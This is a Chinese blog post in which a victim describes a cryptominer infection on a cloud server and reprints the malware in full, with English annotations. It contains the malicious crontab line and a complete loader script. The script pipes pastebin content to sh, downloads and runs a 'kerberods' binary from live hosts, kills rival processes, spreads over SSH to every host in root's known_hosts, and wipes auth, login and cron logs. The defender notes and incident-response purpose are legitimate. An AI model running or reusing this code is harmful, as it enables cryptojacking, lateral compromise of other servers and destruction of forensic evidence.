• 服务器中了挖矿病毒


    这几天阿里云云服务器cpu一直跑满,一查发现有个定时任务,再搜索一下,发现自己中毒了,原来前几天搞redis学习的时候设置了个弱密码,被ssh暴力破解植入病毒了。

    crontab -l
    */15 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh

    在网上找到一篇文章,但是病毒代码不太相同,还是不知道怎么解决,只能重装系统。

    挖矿病毒 qW3xT.2 最终解决方案

    https://blog.csdn.net/hgx13467479678/article/details/82347473 

    我再贴上那个病毒代码吧

    # ------------------------------------------------------------------
    # Malware sample (cryptominer loader) captured from the infected host,
    # kept verbatim for analysis. The crontab entry quoted above re-fetches
    # and re-runs this script every 15 minutes, so deleting files alone
    # does not remove it: the cron entry has to go as well.
    # Stages visible below: (1) kill competing miners / CPU hogs,
    # (2) make sure curl and cron are installed and running, (3) fetch and
    # run the "kerberods" payload keyed on a PID file, (4) spread over SSH
    # to hosts found in root's known_hosts, (5) truncate local logs.
    # ------------------------------------------------------------------
    export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
    
    # Make sure a world-writable /tmp exists for the payload drop below.
    mkdir -p /tmp
    chmod 1777 /tmp
    
    # Stage 1: kill rival miners/loaders by substring match on the process
    # listing. Defender note: these process names and pool domains are
    # IoCs worth alerting on in process listings and DNS logs.
    ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
    ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
    # Remove droppers left behind by other campaigns.
    rm -rf /tmp/go.sh
    rm -rf /tmp/go2.sh
    # Kill anything at >= 80% CPU except khugepageds. This is what takes
    # legitimate workloads down on an infected host, not only other miners.
    ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9
    # Stage 2: install curl and cron across apt/yum/apk, then start cron
    # under every plausible unit/service name so the */15 job keeps firing.
    apt-get install curl -y||yum install curl -y||apk add curl -y
    apt-get install cron -y||yum install crontabs -y||apk add cron -y
    systemctl start crond
    systemctl start cron
    systemctl start crontab
    service start crond
    service start cron
    service start crontab
    
    # Stage 3: /tmp/.X11unix is used as a PID file (its content is read as
    # <pid> in the /proc/<pid>/io check of the elif branch). If the file is
    # missing, or the recorded PID is no longer alive, the payload is
    # (re)launched: /usr/sbin/kerberods if present, otherwise an
    # architecture-specific binary served under a .jpg name is downloaded
    # with curl/wget fallbacks, made executable and run from /tmp.
    # Defender note: the download hosts, /tmp/kerberods, /usr/sbin/kerberods
    # and /tmp/.X11unix are the file/network IoCs of this sample; the
    # payload itself is presumably the miner (not shown on this page).
    if [ ! -f "/tmp/.X11unix" ]; then
        if [ ! -f "/usr/sbin/kerberods" ]; then
            ARCH=$(uname -m)
            if [ ${ARCH}x = "x86_64x" ]; then
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995474x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995474x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995474x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995474x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/vBBGdvb4 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/vBBGdvb4 -O /tmp/kerberods) && chmod +x /tmp/kerberods
            elif [ ${ARCH}x = "i686x" ]; then
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/RitNQ5lb -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/RitNQ5lb -O /tmp/kerberods) && chmod +x /tmp/kerberods
            else
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/RitNQ5lb -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/RitNQ5lb -O /tmp/kerberods) && chmod +x /tmp/kerberods
            fi
                /tmp/kerberods
        else
            /usr/sbin/kerberods
        fi    
    # Same logic again when the PID file exists but /proc/<pid>/io does not,
    # i.e. the previously started payload has died and must be restarted.
    elif [ ! -f "/proc/$(cat /tmp/.X11unix)/io" ]; then
        if [ ! -f "/usr/sbin/kerberods" ]; then
            ARCH=$(uname -m)
            if [ ${ARCH}x = "x86_64x" ]; then
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995474x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995474x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995474x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995474x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/vBBGdvb4 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/vBBGdvb4 -O /tmp/kerberods) && chmod +x /tmp/kerberods
            elif [ ${ARCH}x = "i686x" ]; then
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/RitNQ5lb -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/RitNQ5lb -O /tmp/kerberods) && chmod +x /tmp/kerberods
            else
                (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://t.w2wz.cn/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/700/1554995511x2890211696.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/RitNQ5lb -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/RitNQ5lb -O /tmp/kerberods) && chmod +x /tmp/kerberods
            fi
                /tmp/kerberods
        else
            /usr/sbin/kerberods
        fi
    fi
    
    # Stage 4: lateral movement. When root has an SSH key pair, every
    # IPv4-looking string in root's known_hosts is contacted over key-based
    # SSH (BatchMode, host-key checking disabled) and told to run the same
    # pastebin loader in the background.
    # Defender note: after cleanup, treat every host listed in root's
    # known_hosts as possibly compromised and rotate/revoke root's id_rsa.
    if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
      for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh >/dev/null 2>&1 &' & done
    fi
    
    # Stage 5: anti-forensics. `echo 0>file` opens the file for writing on
    # fd 0, which truncates it: root's mailbox, wtmp (login history), the
    # auth log and the cron log are emptied. Local logs on an infected host
    # therefore cannot be trusted for timeline reconstruction; rely on
    # off-host/centralized logs or the cloud provider's audit trail instead.
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
    #
  • 原文地址:https://www.cnblogs.com/skyislimit/p/10700623.html